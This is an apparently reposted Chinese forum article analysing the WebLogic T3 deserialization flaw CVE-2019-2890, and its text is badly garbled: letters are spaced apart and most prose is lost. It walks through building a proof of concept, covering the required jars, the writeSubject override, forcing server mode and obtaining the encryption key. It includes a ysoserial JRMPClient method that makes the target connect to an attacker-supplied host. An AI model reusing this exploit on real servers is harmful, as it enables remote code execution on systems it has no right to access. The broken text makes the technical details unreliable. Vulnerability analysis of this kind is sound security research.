[6406] 2020-01-05_WeblogicT3反序列化漏洞(CVE-2019-2890)分析

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-17
2020-01-05_WeblogicT3反序列化漏洞(CVE-2019-2890)分析 W e b l o g i c   T 3   C V E - 2 0 1 9 - 2 8 9 0   E   2 0 2 0 - 0 1 - 0 5   l 1 n k 3 r N o . 1 N o . 1 使 N o . 2 N o . 2         2 8 9 0 N o . 3 N o . 3         T 3   r e a d O b j e c t   w e b l o g i c d i f f         T 3   S t r e a m M e s s a g e I m p l M a r s h a l l e d O b j e c t     r e s o l v e C l a s s   r e s o l v e P r o x y C l a s s   1   r e a d O b j e c t   2 r e s o l v e C l a s s     r e s o l v e P r o x y C l a s s             P e r s i s t e n C o n t e x t     .
          w e b l o g i c     r e a d S u b j e c t   v a r 1 E n c r y p t i o n U t i l . d e c r y p t
        P o c P e r s i s t e n C o n t e x t   w r i t e S u b j e c t     r e a d S u b j e c t   N o . 4 N o . 4 1 . j a r         j a r j a r   w e b l o g i c   1 0 . 3 . 6   w e b l o g i c   1 2   j a r c o m . b e a . c o r e . l o g g i n g _ 1 . 9 . 0 . 0 . j a r c o m . b e a . c o r e . m a n a g e m e n t . c o r e _ 2 . 9 . 0 . 1 . j a r c o m . o r a c l e . c o r e . w e b l o g i c . m s g c a t _ 1 . 2 . 0 . 0 . j a r c r y p t o j . j a r g l a s s f i s h . j a x b _ 1 . 1 . 0 . 0 _ 2 - 1 - 1 4 . j a r w e b l o g i c . j a r w l t h i n t 3 c l i e n t . j a r 2 . P e r s i s t e n C o n t e x t           P e r s i n s t e n C o n t e x t   i f
        i f   c o m . b e a . c o r e . s e c u r i t y . m a n a g e r s . N o t S u p p o r t e d E x c e p t i o n           3 . w r i t e S u b j e c t w r i t e O b j e c t           w r i t e S u b j e c t           J R M P
p u b l i c   s t a t i c   R e g i s t r y   g e t O b j e c t ( S t r i n g   c o m m a n d )   t h r o w s   E x c e p t i o n   {                         i n t   s e p   =   c o m m a n d . i n d e x O f ( 5 8 ) ;                       S t r i n g   h o s t ;                         i n t   p o r t ;                         i f   ( s e p   <   0 )   {                               p o r t   =   ( n e w   R a n d o m ( ) ) . n e x t I n t ( 6 5 5 3 5 ) ;                               h o s t   =   c o m m a n d ;                       }   e l s e   {                               h o s t   =   c o m m a n d . s u b s t r i n g ( 0 ,   s e p ) ;                               p o r t   =   I n t e g e r . v a l u e O f ( c o m m a n d . s u b s t r i n g ( s e p   +   1 ) ) ;                       }                       O b j I D   i d   =   n e w   O b j I D ( ( n e w   R a n d o m ( ) ) . n e x t I n t ( ) ) ;                       T C P E n d p o i n t   t e   =   n e w   T C P E n d p o i n t ( h o s t ,   p o r t ) ;                       U n i c a s t R e f   r e f   =   n e w   U n i c a s t R e f ( n e w   L i v e R e f ( i d ,   t e ,   f a l s e ) ) ;                       R e m o t e O b j e c t I n v o c a t i o n H a n d l e r   o b j   =   n e w   R e m o t e O b j e c t I n v o c a t i o n H a n d l e r ( r e f ) ;                       R e g i s t r y   p r o x y   =   ( R e g i s t r y ) P r o x y . n e w P r o x y I n s t a n c e ( y s o s e r i a l . p a y l o a d s . J R M P C l i e n t . c l a s s . g e t C l a s s L o a d e r ( ) ,   n e w   C l a s s [ ] { R e g i s t r y . c l a s s } ,   o b j ) ;                       r e t u r n   p r o x y ;               } 4 .         K e r n e l S t a t u s . i s S e r v e r ( )               i f   ( K e r n e l S t a t u s . i s S e r v e r ( ) )   {                       v a r 5   =   E n c r y p t i o n U t i l . e n c r y p t ( v a r 5 ) ;               }         i f E n c r y p t i o n U t i l . e n c r y p t K e r n e l . i s S e r v e r ( )         p u b l i c   s t a t i c   b y t e [ ]   e n c r y p t ( b y t e [ ]   v a r 0 )   {                 r e t u r n   K e r n e l . i s S e r v e r ( )   ?   g e t E n c r y p t i o n S e r v i c e ( ) . e n c r y p t B y t e s ( v a r 0 )   :   v a r 0 ;       }         K e r n e l S t a t u s . s e t I s S e r v e r ( t r u e ) ; t r u e
        v a r 5   =   E n c r y p t i o n U t i l . g e t E n c r y p t i o n S e r v i c e ( ) . e n c r y p t B y t e s ( ( b y t e   [ ] )   v a r 5 ) ;           g e t E n c r y p t i o n S e r v i c e     p r i v a t e   p u b l i c           E n c r y p t i o n U t i l     g e t E n c r y p t i o n S e r v i c e     p u b l i c   5 . k e y           w e b l o g i c . s e c u r i t y . i n t e r n a l . S e r i a l i z e d S y s t e m I n i   k e y k e y w e b l o g i c g e t s h e l l T 3 w e b l o g i c   S e r i a l i z e d S y s t e m I n i . d a t     s e c u r i t y  
6 .         w e b l o g i c . s e c u r i t y . s u b j e c t . S u b j e c t M a n a g e r           g e t S u b j e c t M a n a g e r     c e C l i e n t   f a s l e   c e S u b j e c t M a n a g e r     t r u e           西 f a l s e p r i v a t e   s t a t i c   f i n a l   b o o l e a n   c e C l i e n t   =   " t r u e " . e q u a l s I g n o r e C a s e ( S y s t e m . g e t P r o p e r t y ( " c o m . b e a . c o r e . i n t e r n a l . c l i e n t " ,   " f a l s e " ) ) ;         S y s t e m . s e t P r o p e r t y ( " c o m . b e a . c o r e . i n t e r n a l . c l i e n t " , " t r u e " ) ;
N o . 5 N o . 5         r e s o l v e C l a s s           E   h t t p s : / / w w w . e a s y a q . c o m
E :   2 0 2 0   5 G E : L a m p i o n     |     E
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则